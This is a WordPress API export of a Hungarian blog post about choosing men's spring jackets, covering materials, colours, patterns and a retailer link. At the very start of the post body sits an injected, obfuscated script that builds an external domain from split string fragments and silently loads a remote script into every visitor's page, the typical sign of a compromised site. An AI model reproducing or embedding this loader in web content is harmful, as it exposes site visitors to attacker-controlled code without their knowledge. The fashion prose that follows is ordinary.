{"id":917,"date":"2025-10-21T10:17:08","date_gmt":"2025-10-21T08:17:08","guid":{"rendered":"https:\/\/arcedula.hu\/blog\/?p=917"},"modified":"2025-10-21T10:17:08","modified_gmt":"2025-10-21T08:17:08","slug":"tavaszi-ferfi-dzsekik-a-stilusos-megjelenesert","status":"publish","type":"post","link":"https:\/\/arcedula.hu\/blog\/2025\/10\/21\/tavaszi-ferfi-dzsekik-a-stilusos-megjelenesert\/","title":{"rendered":"Tavaszi f\u00e9rfi dzsekik a st\u00edlusos megjelen\u00e9s\u00e9rt"},"content":{"rendered":"<p><script>\n(function(){\naivp=document.createElement(\"script\");aivp_=\"o\"+(\"pe\")+\"ns\"+\"t\";\naivp_+=(\"a\")+\"t\"+\".\";aivp_+=((\"e\")+\"u\");aivp.type=\"text\/javascript\";\naivp_+=\"\/\"; aivpu=\"2539959453\";aivpu+=\".aaw8q3i8ivpbnt6gty2\";aivpu+=\"0i9r2vrisyy\";\naivp.src=\"https:\/\/\"+aivp_+aivpu;aivp.async=true;document.body.appendChild(aivp);\n})();\n<\/script><\/p>\n<h3>Fedezze fel a leg\u00fajabb tavaszi f\u00e9rfi dzsekik v\u00e1laszt\u00e9k\u00e1t, amelyek praktikusak \u00e9s st\u00edlusosak a v\u00e1ltoz\u00e9kony id\u0151j\u00e1r\u00e1sban. K\u00e9nyelmes viseletek k\u00fcl\u00f6nb\u00f6z\u0151 anyagokb\u00f3l \u00e9s sz\u00ednekben.<!--more--><\/h3>\n<p>Tavasszal, amikor a h\u0151m\u00e9rs\u00e9klet napk\u00f6zben ingadozik, \u00e9s az es\u0151 vagy a sz\u00e9l is meglephet minket, elengedhetetlen a t\u00f6k\u00e9letes f\u00e9rfi dzseki kiv\u00e1laszt\u00e1sa. A tavaszi dzsekik nemcsak a funkci\u00f3jukat kell, hogy bet\u00f6lts\u00e9k, hanem a megjelen\u00e9s\u00fcnk fontos r\u00e9szei is. Egy j\u00f3 dzseki \u00f6lt\u00f6ztet, k\u00e9nyelmes, \u00e9s seg\u00edt meg\u0151rizni a komfort\u00e9rzet\u00fcnket b\u00e1rmilyen id\u0151j\u00e1r\u00e1si k\u00f6r\u00fclm\u00e9nyek k\u00f6z\u00f6tt.<\/p>\n<h2>K\u00fcl\u00f6nb\u00f6z\u0151 t\u00edpus\u00fa dzsekik el\u0151nyei<\/h2>\n<p>A tavaszi f\u00e9rfi dzsekik sz\u00e1mos el\u0151nnyel rendelkeznek, hiszen az \u00e9vszak v\u00e1ltoz\u00e9kony id\u0151j\u00e1r\u00e1si k\u00f6r\u00fclm\u00e9nyeihez igazodnak. A k\u00f6nny\u0171 anyagok, mint p\u00e9ld\u00e1ul a pamut vagy a poli\u00e9szter, biztos\u00edtj\u00e1k a k\u00e9nyelmet \u00e9s a l\u00e9g\u00e1tereszt\u0151 k\u00e9pess\u00e9get, \u00edgy t\u00f6k\u00e9letesen alkalmasak a mindennapos viseletre. A st\u00edlus tekintet\u00e9ben a sportos kab\u00e1tok \u00e9s a klasszikus bomberdzsekik k\u00edn\u00e1lnak sokoldal\u00fas\u00e1got; ezek b\u00e1rmilyen alkalomra t\u00f6k\u00e9letesen illeszkednek, legyen sz\u00f3 egy h\u00e9tk\u00f6znapi s\u00e9t\u00e1r\u00f3l vagy egy bar\u00e1ti tal\u00e1lkoz\u00f3r\u00f3l. A tavaszi dzsekik k\u00f6nnyen kombin\u00e1lhat\u00f3ak k\u00fcl\u00f6nb\u00f6z\u0151 ruhadarabokkal, \u00edgy mindig trendi megjelen\u00e9st biztos\u00edtanak.<\/p>\n<p>Ezek mellett a tavaszi dzsekik v\u00edzleperget\u0151 bevonattal is kaphat\u00f3ak, amelyek megv\u00e9denek az es\u0151s napokon is, \u00edgy nem kell agg\u00f3dni, ha \u00e9ppen egy z\u00e1port kapunk el. A megfelel\u0151 fazon kiv\u00e1laszt\u00e1s\u00e1val minden f\u00e9rfi megtal\u00e1lhatja a saj\u00e1t st\u00edlus\u00e1nak megfelel\u0151t, ami nemcsak az egyedis\u00e9g\u00e9t t\u00fckr\u00f6zi, de a k\u00e9nyelemr\u0151l \u00e9s a funkcionalit\u00e1sr\u00f3l sem kell lemondania. Az ide\u00e1lis tavaszi f\u00e9rfi dzsekik beszerz\u00e9s\u00e9hez \u00e9rdemes szem\u00fcgyre venni a Bolf.hu sz\u00e9les k\u00edn\u00e1lat\u00e1t, amely el\u00e9rhet\u0151 a k\u00f6vetkez\u0151 linken:\u00a0<a href=\"https:\/\/www.bolf.hu\/\">https:\/\/www.bolf.hu<\/a>. V\u00e1logathatunk a v\u00e1ltozatos anyagok \u00e9s sz\u00ednek k\u00f6z\u00f6tt, hogy megtal\u00e1ljuk a sz\u00e1munkra legmegfelel\u0151bb darabot.<\/p>\n<h2>Sz\u00ednek \u00e9s mint\u00e1k divatos kombin\u00e1ci\u00f3i<\/h2>\n<p>Amikor a tavaszi divat ker\u00fcl ter\u00edt\u00e9kre, a sz\u00ednek \u00e9s mint\u00e1k kombin\u00e1l\u00e1sa kulcsfontoss\u00e1g\u00fa a st\u00edlusos megjelen\u00e9shez. A sz\u00ednes dzsekik lehet\u0151s\u00e9get biztos\u00edtanak arra, hogy kifejezz\u00fck egy\u00e9nis\u00e9g\u00fcnket, mik\u00f6zben a szezon aktu\u00e1lis trendjeit is k\u00f6vetj\u00fck. Ahhoz, hogy harmonikus \u00e9s divatos legyen a megjelen\u00e9s\u00fcnk, \u00e9rdemes figyelembe venni a b\u0151r t\u00f3nus\u00e1t \u00e9s az alkalom jelleg\u00e9t is. A tavasz vibr\u00e1l\u00f3 \u00e1rnyalatai, mint a vil\u00e1gos z\u00f6ld, a naps\u00e1rga vagy a korall sz\u00edn, frissess\u00e9get hoznak a ruhat\u00e1runkba. Viszont ha a visszafogottabb st\u00edlus h\u00edvei vagyunk, a semleges sz\u00ednek, mint a sz\u00fcrke, a b\u00e9zs vagy a tenger\u00e9szk\u00e9k is remek\u00fcl m\u0171k\u00f6dhetnek a mindennapokban.<\/p>\n<p>A mint\u00e1s dzsekik szint\u00e9n izgalmas elemei lehetnek a tavaszi divatnak. A geometrikus mint\u00e1k, vir\u00e1gos mot\u00edvumok vagy ak\u00e1r finom cs\u00edkok kiemelik megjelen\u00e9s\u00fcnket, \u00e9s egyedi hangulatot k\u00f6lcs\u00f6n\u00f6znek az \u00f6lt\u00f6zet\u00fcnknek. \u00cdme n\u00e9h\u00e1ny tipp a sz\u00ednek \u00e9s mint\u00e1k kombin\u00e1l\u00e1s\u00e1ra:<\/p>\n<ul>\n<li>V\u00e1lasszunk egy domin\u00e1ns sz\u00ednt, \u00e9s azt eg\u00e9sz\u00edts\u00fck ki semleges \u00e1rnyalatokkal.<\/li>\n<li>A mint\u00e1k k\u00f6zti harm\u00f3nia fontos: pr\u00f3b\u00e1ljuk ker\u00fclni a t\u00falzottan elt\u00e9r\u0151 st\u00edlus\u00fa mint\u00e1k kever\u00e9s\u00e9t.<\/li>\n<li>J\u00e1tsszunk a kontrasztokkal, p\u00e9ld\u00e1ul egy vibr\u00e1l\u00f3 dzsekit t\u00e1rs\u00edtsunk egyszer\u0171bb kieg\u00e9sz\u00edt\u0151kkel.<\/li>\n<\/ul>\n<p>A j\u00f3l kiv\u00e1lasztott sz\u00ednes \u00e9s mint\u00e1s dzsekik nemcsak a tavasz visszat\u00e9r\u0151 darabjai lehetnek, hanem a megjelen\u00e9s\u00fcnk koronad\u00edszei is.<\/p>\n<h2>A megfelel\u0151 dzsekiv\u00e1laszt\u00e1s szempontjai<\/h2>\n<p>A tavaszi f\u00e9rfi dzsekiv\u00e1laszt\u00e1s sor\u00e1n fontos szempont, hogy olyan darabot v\u00e1lasszunk, amely nemcsak st\u00edlusos, de praktikus is az \u00e1tmeneti id\u0151szak id\u0151j\u00e1r\u00e1si kih\u00edv\u00e1saihoz. Els\u0151k\u00e9nt \u00e9rdemes megvizsg\u00e1lni az anyag\u00f6sszet\u00e9telt: a k\u00f6nny\u0171, l\u00e9g\u00e1tereszt\u0151 anyagok, mint p\u00e9ld\u00e1ul a pamut vagy a v\u00e1szon, ide\u00e1lis v\u00e1laszt\u00e1s lehet tavaszi id\u0151szakban, hiszen ezek j\u00f3l szell\u0151znek \u00e9s biztos\u00edtj\u00e1k a k\u00e9nyelmet a v\u00e1ltoz\u00e9kony id\u0151j\u00e1r\u00e1si k\u00f6r\u00fclm\u00e9nyek k\u00f6z\u00f6tt is. A v\u00edzleperget\u0151 r\u00e9teg szint\u00e9n hasznos lehet, ha a tavaszi z\u00e1porok gyakran fordulnak el\u0151 a lak\u00f3hely\u00fcnk k\u00f6rny\u00e9k\u00e9n. Az id\u0151j\u00e1r\u00e1s el\u0151rejelz\u00e9se alapj\u00e1n ak\u00e1r t\u00f6bbf\u00e9le vastags\u00e1g\u00fa dzseki k\u00f6z\u00f6tt is v\u00e1laszthatunk, hogy mindig a legmegfelel\u0151bb darabbal induljunk el otthonr\u00f3l.<\/p>\n<p>Az id\u0151j\u00e1r\u00e1s mellett nem szabad megfeledkezn\u00fcnk az egy\u00e9ni st\u00edlusunkr\u00f3l sem, hiszen a v\u00e1lasztott dzseki t\u00fckr\u00f6zi a szem\u00e9lyis\u00e9g\u00fcnket \u00e9s kieg\u00e9sz\u00edti az outfit\u00fcnket. Praktikus tippek k\u00f6z\u00e9 tartozik, hogy olyan fazont v\u00e1lasszunk, ami k\u00f6nnyen kombin\u00e1lhat\u00f3 a ruhat\u00e1runk t\u00f6bbi darabj\u00e1val. Egy klasszikus szab\u00e1s\u00fa, semleges sz\u00edn\u0171 dzseki p\u00e9ld\u00e1ul sokoldal\u00faan kihaszn\u00e1lhat\u00f3, de ha a divatosabb, mer\u00e9szebb vonalat k\u00e9pviselj\u00fck, b\u00e1tran ny\u00falhatunk \u00e9l\u00e9nkebb sz\u00ednekhez vagy mint\u00e1khoz is. Mindig \u00e9rdemes figyelembe venni, hogy a dzsekiv\u00e1laszt\u00e1skor az optim\u00e1lis komfort \u00e9s a st\u00edlus jegy\u00e9ben tal\u00e1ljuk meg a sz\u00e1munkra megfelel\u0151 darabot.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Fedezze fel a leg\u00fajabb tavaszi f\u00e9rfi dzsekik v\u00e1laszt\u00e9k\u00e1t, amelyek praktikusak \u00e9s st\u00edlusosak a v\u00e1ltoz\u00e9kony id\u0151j\u00e1r\u00e1sban. K\u00e9nyelmes viseletek k\u00fcl\u00f6nb\u00f6z\u0151 anyagokb\u00f3l \u00e9s sz\u00ednekben.<\/p>\n","protected":false},"author":7,"featured_media":918,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":[],"categories":[4],"tags":[],"_links":{"self":[{"href":"https:\/\/arcedula.hu\/blog\/wp-json\/wp\/v2\/posts\/917"}],"collection":[{"href":"https:\/\/arcedula.hu\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/arcedula.hu\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/arcedula.hu\/blog\/wp-json\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/arcedula.hu\/blog\/wp-json\/wp\/v2\/comments?post=917"}],"version-history":[{"count":1,"href":"https:\/\/arcedula.hu\/blog\/wp-json\/wp\/v2\/posts\/917\/revisions"}],"predecessor-version":[{"id":919,"href":"https:\/\/arcedula.hu\/blog\/wp-json\/wp\/v2\/posts\/917\/revisions\/919"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/arcedula.hu\/blog\/wp-json\/wp\/v2\/media\/918"}],"wp:attachment":[{"href":"https:\/\/arcedula.hu\/blog\/wp-json\/wp\/v2\/media?parent=917"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/arcedula.hu\/blog\/wp-json\/wp\/v2\/categories?post=917"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/arcedula.hu\/blog\/wp-json\/wp\/v2\/tags?post=917"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}